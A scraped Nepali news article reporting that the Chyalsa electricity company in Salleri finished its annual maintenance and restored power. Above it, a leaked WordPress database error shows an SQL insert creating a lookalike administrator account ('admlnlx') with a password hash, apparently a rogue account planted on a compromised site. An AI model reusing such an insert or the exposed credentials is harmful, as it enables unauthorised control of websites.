WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BnpUD3dfw4CLWQCumKugzbyUJ7fmRo/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 11:10:44', '', 'admlnlx', 'admlnlx')
बैशाख, गत आईतबार देखी आफ्नो सम्पुर्ण सेवा बन्द गरेर मर्मत संभारमा लागेको च्याल्सा विद्युत कम्पनिले मर्मतको काम पुरा गरेको छ । आफ्नो मर्मतको सम्पुर्ण काम सकेर कम्पनीले शुक्रबार दिउसो साढे २ बजेदेखी विद्युत सेवा सुचारु गरेको कम्पनीले जनाएको छ ।
बार्षिक मर्मत सम्भार एवम् सरसफाई कार्यक्रम अन्तरगत इन्टेक, कुलो, पाईप लाईन सरसफाई गर्ने, विद्युत लाईन विस्तार भएको क्षेत्रमा हरियो रुख बिरुवाले छुन लगेको भए काट्ने लगाएको काम गरिएको च्याल्सा विद्युत कम्पनीले जनाएको छ । च्याल्सा विद्युत कम्पनीले अहिले सदरमुकाम सल्लेरी सहित गार्मा, खोरिया, लगाएतका करिब १६ सय बढी घरधुरीलाई सेवा प्रदान गरिरहेको छ ।
विद्युत सेवा अवरुद्ध हुँदा सदरमुकाम सल्लेरी र आसपासको जनजीवन कष्टकर बनेको थियो । गत बैशाख २३ गते देखी सदरमुकाम सल्लेरी लगाएत आसपासको क्षेत्रमा विद्युत सेवा प्रदान गरेको सल्लेरी च्याल्सा विद्युत कम्पनीले बार्षिक कार्यक्रम अन्तरगत विद्युत मर्मत संभार सुरु गरे संगै यहाँको जनजीवन कष्टकर बनेको हो ।